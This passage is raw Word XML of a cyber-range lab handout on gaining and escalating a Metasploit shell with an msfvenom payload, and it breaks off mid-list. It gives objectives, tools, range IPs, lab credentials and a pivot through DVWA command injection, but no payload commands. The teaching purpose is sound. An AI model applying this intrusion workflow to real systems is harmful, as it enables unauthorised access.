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DBD79" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000" w:rsidP="00AB61FA">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>TINY CYBERLAB (TCL) · RANGE LAB SERIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCA95BD" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000" w:rsidP="00AB61FA">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>TCL 21 — How to Gain and Escalate a Shell with a Custom Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF31C6" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000" w:rsidP="00AB61FA">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Cipher Logistics Security Assessment Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353E6C54" w14:textId="77777777" w:rsidR="00AB61FA" w:rsidRDefault="00AB61FA" w:rsidP="00AB61FA">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320A4CFB" w14:textId="77777777" w:rsidR="00AB61FA" w:rsidRDefault="00AB61FA" w:rsidP="00AB61FA">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1183C743" w14:textId="77777777" w:rsidR="00AB61FA" w:rsidRDefault="00AB61FA" w:rsidP="00AB61FA">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77856905" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Introduction &amp; Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541ADAD4" w14:textId="77777777" w:rsidR="00E656F4"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Docker-based cyber range. Lab 21 focuses on: building a payload, gaining a session, escalating privilege, and operating on a compromised host with Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2549D427" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CAD8B" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Identify a target and a matching payload with Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7A6B04" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Build a payload with msfvenom and host it for delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356830CD" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Catch a session with a multi/handler and interact via Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7924F2B9" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Escalate privilege, modify the file system, and upload and execute a script on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980A3A3" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Tools used in this lab (4, CEH exam-relevant):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4770"/>
        <w:gridCol w:w="4770"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E656F4" w14:paraId="7ACA6542" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="7712646D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="17A39CFD" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role in this lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="30F38DF7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="419B7C87" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfvenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050521EF" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Payload generation — CEH “System Hacking” domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="63CADC5F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A9A02CB" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfconsole / multi-handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5169D2DA" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Catching and managing sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="165D12F2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="787506EB" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C97607B" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Post-exploitation interaction with the compromised host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="063F7BD3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BAC939A" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A72B92" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cracking any hashes recovered post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C7E03D3" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. NIST/NICE Role Alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19659C02" w14:textId="77777777" w:rsidR="00E656F4"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E656F4" w14:paraId="0AA6A531" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="6A1EB0D8" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Work role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="3673508C" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="00E5CAED" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>How this lab fulfills it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="409E290E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="361BFA08" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A53D0D8" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PD-WRL-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C7FDF16" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Turning a confirmed weakness into a working session, then operating within scope, is the demonstrated-impact step a vulnerability assessment builds toward.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E99E4AB" w14:textId="77777777" w:rsidR="00E656F4"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E656F4" w14:paraId="5E3248A5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="40E61AC9" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="569E605E" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="14E3DDB4" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="04BCF6EB" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>OS / Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="60595582" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="099A2616" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A19DBC6" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D11221B" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attacker workstation (Kali + XFCE/RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75564437" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.10.0.10 (internet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0983ED17" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="252B4F9E" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>root / cyberrange</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E656F4" w14:paraId="75CF2ADD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79B3CA9E" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>metasploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01710B2F" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerable Linux (LAN, via pivot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68C6C03F" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.30.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BCA173E" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Metasploitable 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02EA691D" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfadmin / msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27AC5C5F" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="053A81A2" wp14:editId="308BCAE4">
            <wp:extent cx="5760720" cy="3210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10301"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A606B20" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 1 — Tiny CyberLab (TCL) topology (all labs share this environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA7074" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Note: CyberLab is a segmented range on one Docker host — an INTERNET segment (10.10.0.0/24) with the attacker and a firewall router, a DMZ (10.20.0.0/24) with the web apps and DNS, and an internal LAN (10.30.0.0/24) with the vulnerable host. Work from the attacker (10.10.0.10): for the GUI labs open its desktop over RDP at 127.0.0.1:3389 (user root, password cyberrange); for a terminal run  docker exec -it attacker bash . From the attacker the router permits the DMZ on ports 80, 3000, 53 and ICMP only, so the web apps (juiceshop 10.20.0.11:3000, dvwa 10.20.0.12:80) and DNS (10.20.0.53) are directly reachable. The LAN host (metasploitable 10.30.0.20) is reachable only by PIVOTING through the dual-homed dvwa (10.20.0.12 / 10.30.0.12) — treat that as the bonus objective. Confirm live values with  docker ps  and  docker network inspect br-dmz . Nothing is published outside the host, so all testing is contained.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E656F4" w14:paraId="5F0F03A8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEE7F1"/>
          </w:tcPr>
          <w:p w14:paraId="45B91D6F" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>Reaching the target in this lab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69AAF893" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>This lab's target, metasploitable (10.30.0.20), is on the internal LAN. The firewall does not forward to the LAN and the attacker has no direct route to it, so you must PIVOT through the dual-homed dvwa (10.20.0.12 in the DMZ, 10.30.0.12 on the LAN). DVWA is deliberately vulnerable (its Command Injection page gives you code execution on that box), which is the intended foothold; from there you reach the LAN. See “Pivoting to the LAN” in the student quickstart. Where a full pivot is beyond your class, treat reaching the LAN host as the bonus objective and complete the lab's technique against a DMZ host or with offline data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E0C1F38" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216835C" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>By the end of this lab, you will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BA1600" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Identify a target and a matching payload with Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EAAC9A" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Build a payload with msfvenom and host it for delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC8F66" w14:textId="77777777" w:rsidR="00E656F4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
